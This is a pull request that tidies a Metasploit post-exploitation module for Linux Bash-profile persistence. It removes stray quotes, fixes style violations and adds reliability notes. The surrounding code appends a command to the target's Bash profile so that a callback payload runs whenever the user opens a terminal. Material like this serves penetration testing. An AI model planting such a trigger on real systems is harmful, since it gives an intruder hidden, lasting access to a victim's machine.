### PR TITLE
bash_profile_persistence: Add notes and resolve rubocop violations

### DIFF
--- a/modules/exploits/linux/local/bash_profile_persistence.rb
+++ b/modules/exploits/linux/local/bash_profile_persistence.rb
@@ -15,12 +15,10 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Bash Profile Persistence',
         'Description' => %q{
-          "
           This module writes an execution trigger to the target's Bash profile.
           The execution trigger executes a call back payload whenever the target
           user opens a Bash terminal. A handler is not run automatically, so you
           must configure an appropriate exploit/multi/handler to receive the callback.
-          "
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -48,7 +46,12 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'References' => [
           ['URL', 'https://attack.mitre.org/techniques/T1156/']
-        ]
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
+        }
       )
     )
 
@@ -92,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Local
     # write payload trigger to Bash profile
     exec_payload_string = "#{payload_file} > /dev/null 2>&1 &" + "\n" # send stdin,out,err to /dev/null
     append_file(profile_path, exec_payload_string)
-    print_good("Created Bash profile persistence")
-    print_status("Payload will be triggered when target opens a Bash terminal")
+    print_good('Created Bash profile persistence')
+    print_status('Payload will be triggered when target opens a Bash terminal')
     print_warning("Don't forget to start your handler:")
     print_warning("msf> handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}")
   end
@@ -101,18 +104,18 @@ class MetasploitModule < Msf::Exploit::Local
   # create a backup copy of the target's Bash profile on the local system before persistence is added
   def create_backup_file(backup_profile)
     begin
-      hostname = session.sys.config.sysinfo["Computer"]
-    rescue
-      hostname = cmd_exec("hostname")
+      hostname = session.sys.config.sysinfo['Computer']
+    rescue NoMethodError
+      hostname = cmd_exec('hostname')
     end
 
-    timestamp = "_" + ::Time.now.strftime("%Y%m%d.%H%M%S")
+    timestamp = '_' + ::Time.now.strftime('%Y%m%d.%H%M%S')
 
     log_directory_name = ::File.join(Msf::Config.log_directory, 'persistence/' + hostname + timestamp)
 
     ::FileUtils.mkdir_p(log_directory_name)
 
-    log_file_name = log_directory_name + "/Bash_Profile.backup"
+    log_file_name = log_directory_name + '/Bash_Profile.backup'
     file_local_write(log_file_name, backup_profile)
     return log_file_name
   end


### PR DESCRIPTION
Removes a couple of quotes `"` in the module description. Not sure why they were there.

Resolved rubocop violations while I was at it. Also added notes, as missing notes is also a rubocop violation.
